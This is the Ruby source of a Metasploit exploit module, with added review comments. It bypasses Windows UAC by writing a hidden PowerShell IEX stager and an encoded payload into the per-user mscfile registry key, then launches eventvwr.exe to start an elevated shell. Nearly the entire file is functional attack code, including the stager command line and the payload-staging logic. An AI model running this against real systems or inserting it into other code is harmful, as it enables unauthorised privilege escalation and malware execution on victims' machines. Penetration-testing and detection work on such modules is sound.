GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/local/bypassuac_eventvwr.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Exploit::Powershell
  include Post::Windows::Priv
  include Post::Windows::Registry
  include Post::Windows::Runas

  # Parent key removed on cleanup when the command key did not exist beforehand.
  EVENTVWR_DEL_KEY = 'HKCU\\Software\\Classes\\mscfile'.freeze
  # Key whose "(Default)" value is written; a per-user (HKCU) hijack, so no
  # elevation is needed to write it. Writes to this path are the observable
  # artifact of this technique from a monitoring standpoint.
  EVENTVWR_WRITE_KEY = 'HKCU\\Software\\Classes\\mscfile\\shell\\open\\command'.freeze
  EXEC_REG_VAL = ''.freeze # This maps to "(Default)"
  EXEC_REG_VAL_TYPE = 'REG_SZ'.freeze
  EVENTVWR_PATH = '%WINDIR%\\System32\\eventvwr.exe'.freeze
  EVENTVWR_WOW64_PATH = '%WINDIR%\\SysWOW64\\eventvwr.exe'.freeze
  PSH_PATH = '%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe'.freeze
  # NOTE(review): not referenced anywhere in this file as shown; presumably a
  # historical command-length limit. Confirm before relying on it.
  CMD_MAX_LEN = 2081

  # Module metadata: name, description, authorship, targets, references and the
  # Meterpreter commands (railgun) the exploit method depends on.
  #
  # @param info [Hash] metadata overrides merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)',
        'Description' => %q{
          This module will bypass Windows UAC by hijacking a special key in the Registry under
          the current user hive, and inserting a custom command that will get invoked when
          the Windows Event Viewer is launched. It will spawn a second shell that has the UAC
          flag turned off.

          This module modifies a registry key, but cleans up the key once the payload has
          been invoked.

          The module does not require the architecture of the payload to match the OS. If
          specifying EXE::Custom your DLL should call ExitProcess() after starting your
          payload in a separate process.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Matt Nelson', # UAC bypass discovery and research
          'Matt Graeber', # UAC bypass discovery and research
          'OJ Reeves' # MSF module
        ],
        'Platform' => ['win'],
        'SessionTypes' => ['meterpreter'],
        'Targets' => [
          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
          [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
        ],
        'DefaultTarget' => 0,
        'References' => [
          ['URL', 'https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/'],
          ['URL', 'https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1']
        ],
        'DisclosureDate' => '2016-08-15',
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              stdapi_railgun_api
            ]
          }
        }
      )
    )
  end

  # Version-range check only: reports Appears for builds from Win7 SP0 through
  # Win10 1607 inclusive, Safe for anything outside that range. It does not
  # inspect the UAC level or the registry key itself; those are checked in
  # check_permissions! and exploit respectively.
  #
  # @return [Exploit::CheckCode] Appears or Safe
  def check
    version = get_version_info
    if version.build_number.between?(Msf::WindowsVersion::Win7_SP0, Msf::WindowsVersion::Win10_1607)
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end

  # Main flow: validate session/target architecture, validate privileges and
  # UAC level, write the hijack command and payload into EVENTVWR_WRITE_KEY,
  # launch eventvwr.exe via ShellExecuteA, wait for the handler, then restore
  # or remove the registry key.
  #
  # NOTE(review): the cleanup at the end is not wrapped in an ensure block, so
  # any exception raised between the registry_setvaldata calls and the cleanup
  # leaves the hijacked key (and the stored payload value) on disk.
  def exploit
    eventvwr_cmd = EVENTVWR_PATH
    registry_view = REGISTRY_VIEW_NATIVE

    # Make sure we have a sane payload configuration

    if session.arch != target.arch.first
      fail_with(Failure::NoTarget, 'Session and Target arch must match')
    end
    if sysinfo['Architecture'] == ARCH_X64
      vprint_status('Target is x64')
      # x86 session on an x64 host: use the 64-bit registry view and the
      # SysWOW64 copy of eventvwr.exe.
      if session.arch == ARCH_X86
        vprint_status('Detected Target/Session mismatch. Syswow Required.')
        registry_view = REGISTRY_VIEW_64_BIT
        eventvwr_cmd = EVENTVWR_WOW64_PATH
      end
    elsif target_arch.first == ARCH_X64
      # if we're on x86, we can't handle x64 payloads
      # NOTE(review): this branch reads target_arch while the guard above reads
      # target.arch; presumably equivalent helpers — confirm.
      fail_with(Failure::BadConfig, 'x64 Target Selected for x86 System')
    end

    # Validate that we can actually do things before we bother
    # doing any more work
    check_permissions!

    # Only the Default UAC level proceeds with the registry hijack. "Always
    # Notify" variants abort; DoNotPrompt hands off to shell_execute_exe and
    # returns without touching the registry.
    case get_uac_level
    when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
         UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
         UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
      fail_with(Failure::NotVulnerable,
                "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
    when UAC_DEFAULT
      print_good('UAC is set to Default')
      print_good('BypassUAC can bypass this setting, continuing...')
    when UAC_NO_PROMPT
      print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
      shell_execute_exe
      return
    end

    # Random value name under which the PowerShell payload is stored in the key.
    payload_value = rand_text_alpha(8)
    psh_path = expand_path(PSH_PATH.to_s)
    template_path = Rex::Powershell::Templates::TEMPLATE_DIR
    vprint_status("template_path #{template_path}")
    psh_payload = Rex::Powershell::Payload.to_win32pe_psh_reflection(template_path, payload.encoded)

    # The stager reads the payload back out of the same registry key; the
    # gsub rewrites the Win32 hive prefix into PowerShell's HKCU: drive form.
    psh_stager = "\"IEX (Get-ItemProperty -Path #{EVENTVWR_WRITE_KEY.gsub('HKCU', 'HKCU:')} -Name #{payload_value}).#{payload_value}\""
    cmd = "#{psh_path} -nop -w hidden -c #{psh_stager}"

    # Remember any pre-existing "(Default)" value so it can be restored later.
    # NOTE(review): an existing but empty value is indistinguishable from a
    # missing key here, and would lead to the parent key being deleted on cleanup.
    existing = registry_getvaldata(EVENTVWR_WRITE_KEY, EXEC_REG_VAL, registry_view) || ''

    if existing.empty?
      registry_createkey(EVENTVWR_WRITE_KEY, registry_view)
    end

    print_status('Configuring payload and stager registry keys ...')
    registry_setvaldata(EVENTVWR_WRITE_KEY, EXEC_REG_VAL, cmd, EXEC_REG_VAL_TYPE, registry_view)
    registry_setvaldata(EVENTVWR_WRITE_KEY, payload_value, psh_payload, EXEC_REG_VAL_TYPE, registry_view)

    cmd_path = expand_path(eventvwr_cmd.to_s)
    print_status("Executing payload: #{cmd_path}")
    # ShellExecuteA returns an HINSTANCE-style value; the code treats > 32 as success.
    result = client.railgun.shell32.ShellExecuteA(nil, 'open', cmd_path, nil, nil, 'SW_HIDE')

    if result['return'] > 32
      print_good('eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute.')
      Rex.sleep(10)
    else
      print_error("eventvwr.exe execution failed with Error Code: #{result['GetLastError']} - #{result['ErrorMessage']}")
    end

    handler(client)

    # Cleanup: remove the parent key if it was created here, otherwise put the
    # original "(Default)" back and drop only the payload value.
    print_status('Cleaning up registry keys ...')
    if existing.empty?
      registry_deletekey(EVENTVWR_DEL_KEY, registry_view)
    else
      registry_setvaldata(EVENTVWR_WRITE_KEY, EXEC_REG_VAL, existing, EXEC_REG_VAL_TYPE, registry_view)
      registry_deleteval(EVENTVWR_WRITE_KEY, payload_value, registry_view)
    end
  end

  # Aborts via fail_with unless the session is non-elevated, the version check
  # reports Appears, the user is in the Administrators group, and the integrity
  # level is above Low.
  #
  # NOTE(review): is_in_admin_group? is evaluated twice. Because the second,
  # unconditional `unless is_in_admin_group?` fails on nil as well as false,
  # the later `admin_group.nil?` branch (the "whoami missing" message) cannot
  # be reached as written.
  #
  # @raise [Msf::Exploit::Failed] via fail_with on any unmet precondition
  def check_permissions!
    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?

    # Check if you are an admin
    vprint_status('Checking admin status...')
    admin_group = is_in_admin_group?

    unless check == Exploit::CheckCode::Appears
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
    end

    unless is_in_admin_group?
      fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
    end

    print_status('UAC is Enabled, checking level...')
    if admin_group.nil?
      print_error('Either whoami is not there or failed to execute')
      print_error('Continuing under assumption you already checked...')
    elsif admin_group
      print_good('Part of Administrators group! Continuing...')
    else
      fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
    end

    if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
      fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
    end
  end
end